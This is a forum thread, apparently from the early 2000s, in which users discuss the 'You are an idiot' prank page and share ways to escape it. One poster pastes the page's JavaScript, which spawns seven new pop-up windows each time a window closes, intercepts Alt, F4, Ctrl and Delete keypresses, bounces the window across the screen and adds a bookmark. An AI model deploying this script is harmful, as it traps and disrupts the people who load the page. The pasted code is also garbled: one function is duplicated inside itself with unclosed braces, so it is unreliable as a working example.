what programming language do you use to create something like this?

Legendary

Diamond Member
Jan 22, 2002
7,019
1
0
I believe it's javascript
(if anyone can't get out of it use task manager and close the IEXPLORE process)
 

FoBoT

No Lifer
Apr 30, 2001
63,084
15
81
fobot.com
i believe that is a virus

you need to add to your warning "NO REALLY, YOU WILL BE MAD IF YOU CLICK THE LINK, IT REALLY SUCKS!!!"
 

zayened

Diamond Member
Feb 28, 2001
3,931
0
0
how did you get into the source page? i tried for the life of me and couldnt do anything but create 96 internet explorer windows
 

DoNotDisturb

Senior member
Jul 24, 2002
842
0
0
Originally posted by: FoBoT
i believe that is a virus

you need to add to your warning "NO REALLY, YOU WILL BE MAD IF YOU CLICK THE LINK, IT REALLY SUCKS!!!"

it doesn't necessarily need to be a virus. i dont think he should post that link either.

 

zayened

Diamond Member
Feb 28, 2001
3,931
0
0
its not a virus, norton would have detected it if it was. why do i not need to be posting that link? i happen to think that it is a cool thing to know how to program
 

DoNotDisturb

Senior member
Jul 24, 2002
842
0
0
haha cuz i clicked on it =P noobs might not know how to close it and end up restarting their computers.
 

KingNothing

Diamond Member
Apr 6, 2002
7,141
1
0
I use CrazyBrowser, so I opened up the link, looked at the source, said "that's cute", and then closed the tab. Crazy Browser blocks pop-ups and puts all webpages on tabs. What do I win? :D
 

DoNotDisturb

Senior member
Jul 24, 2002
842
0
0
doesn't necessarily need to be flash, i believe it can be a simple animation embedded into the program. you can use flash to shake screens though as well.
 

aceO07

Diamond Member
Nov 6, 2000
4,491
0
76
I use Mozilla. That page just has 'you are an idiot' singing along with the background. I disabled creation of new browser windows, so that's all I get.
 

ProviaFan

Lifer
Mar 17, 2001
14,993
1
0
Originally posted by: aceO07
I use Mozilla. That page just has 'you are an idiot' singing along with the background. I disabled creation of new browser windows, so that's all I get.
I use Mozilla, and didn't know that that option even existed. Unfortunately, it only took a second before I realized that it was just a javascript "virus" and said "oh sh!t" while I pressed CTRL+ALT+DEL, clicked on Task Manager, and killed Mozilla - loosing all the other pages I had open in tabs at the time. :| :disgust:

Needless to say, I have now enabled that option to not allow scripts to open unrequested windows.
 

Blieb

Diamond Member
Apr 17, 2000
3,475
0
76
This probably won't come out right, but here's the source, I just used wget in a shell:

<html>
<head>
<title>You are an idiot!</title>
<script language=Javascript>

function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="http://www.youdontknowwhoiam.org/lol.html";
var title="Idiot!";
window.external.AddFavorite(url,title);
}
}

function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); }
function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); }

var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;

function openWindow(url){
aWindow = window.open(url,"_blank",
'menubar=no,status=no,toolbar=no,resizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');
}

function procreate(){
openWindow('lol.html');
openWindow('lol.html');
openWindow('lol.html');
openWindow('lol.html');
openWindow('lol.html');
openWindow('lol.html');
openWindow('lol.html');
}

function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}

function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}

function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
}

function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}
function fOff(){
flagrun = 0;
}

function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos < 0){
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos < 0){
newYdn();
}
if (flagRun == 1){
function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos < 0){
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos < 0){
newYdn();
}
if (flagRun == 1){
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
}

</script>
</head>
<body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();"
onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">
<param name=movie value="youare.swf">
<param name=quality value=high>
<embed src="youare.swf" quality=high
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash" width="100%" height="100%">
</embed>
</object>
</body>
</html>
 

Kev

Lifer
Dec 17, 2001
16,367
4
81
Originally posted by: KingNothing
I use CrazyBrowser, so I opened up the link, looked at the source, said "that's cute", and then closed the tab. Crazy Browser blocks pop-ups and puts all webpages on tabs. What do I win? :D